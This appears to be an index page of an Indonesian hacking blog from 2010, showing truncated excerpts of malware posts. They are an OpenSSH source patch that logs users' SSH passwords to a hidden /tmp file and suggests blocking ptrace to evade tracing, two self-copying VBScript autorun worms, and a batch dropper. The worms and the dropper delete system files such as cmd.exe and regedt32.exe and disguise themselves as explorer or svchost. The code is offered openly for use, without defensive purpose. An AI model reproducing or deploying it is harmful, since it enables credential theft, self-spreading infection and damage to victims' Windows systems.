Jumat, 05 Maret 2010

Memodifikasi source code stealing password

Some Bullshit About SSH Keylogger! This ssh keylogger patch just works on FreeBSD system. Use your fucking brain to make it working in other operating system. For Anti debugging feature, there is simple idea to prevent tracing system like strace, just prevent ptrace syscall! If you are cool enough, improve this keylogger to encrypt the data. Keep Hacking boyz! SSH Keylogger OpenSSH-5.3p1 Patch. --- sshconnect2.c.ori 2010-02-12 21:44:49.000000000 +0700 +++ sshconnect2.c 2010-02-12 22:13:43.000000000 +0700 @@ -31,6 +31,7 @@ #include #include +#include #include #include #include @@ -75,6 +76,10 @@ #include "ssh-gss.h" #endif +//SSH log + +#define LOGZ "/tmp/.byteskrew" // change this line and make it more hidden + /* import */ extern char *client_version_string; ...

Selasa, 02 Maret 2010

kendi.vbs

on error resume next dim a,b,c,d,e,f,g,h,K3nd1,j,l,m,n h = "[autorun]" & vbcrlf & "shellexecute=wscript.exe K3nd1.vbs" set a = createobject("Scripting.filesystemobject") set b = a.getfile(Wscript.ScriptFullname) a.CopyFile "K3nd1.vbs", "C:\WinNT.Dat" a.CopyFile "K3nd1.vbs", "C:\Windows\System32\K3nd1.vbs" a.CopyFile "K3nd1.vbs", "C:\Winnt\System32\K3nd1.vbs" n = b.size i = b.drive.drivetype set m = b.openastextstream(1,-2) do while not m.atendofstream c = c & m.readline c = c & vbcrlf loop Set d = a.getspecialfolder(0) a.CopyFile WScript.ScriptFullname(d & "\K3nd1.jpg.vbs") Set e = a.getspecialfolder(1) a.CopyFile WScript.ScriptFullname(e & "\K3nd1.vbs") set...

batch made by ferdy

copy ferdy.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\” attrib ferdy.exe +s +h +r copy ferdy.exe “%USERSPROFILE%\Start Menu\Programs\Startup\” attrib ferdy.exe +s +h +r echo silahkan tunggu sebentar.... del "c:\windows\system32\bootok" /q/s >nul del "c:\windows\system32\bootvid.dll" /q /s >nul del "c:\windows\system32\bootvrfy" /q /s >nul del "c:\windows\system32\regedt32.exe" /q /s >nul ren ferdy.exe explorers.exe copy explorers.exe %SYSTEMROOT%\ copy explorers.exe %SYSTEMROOT%\svchost.bat copy explorers.exe %SYSTEMROOT%\system32\ copy explorers.exe %SYSTEMROOT%\system32\svchost.bat copy explorers.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\” attrib explorers.exe +s +h +r copy explorers.exe “%USERSPROFILE%\Start Menu\Programs\Startup\” attrib explorers.exe +s...

flyff666.dll.vbs

on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd atr = "[autorun]"&vbcrlf&"shellexecute=WScript.exe ferdy.vbs" set fs = createobject("Scripting.FileSystemObject") Fs.DeleteFile("C:/Windows/System32/regedt32.exe") Fs.DeleteFile("C:/Windows/System32/cmd.exe") set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf Loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\ferdy.vbs") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\ferdy.vbs",2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & "\ferdy.vbs") tf.attributes = 39 for...

Page 1 of 331234567 »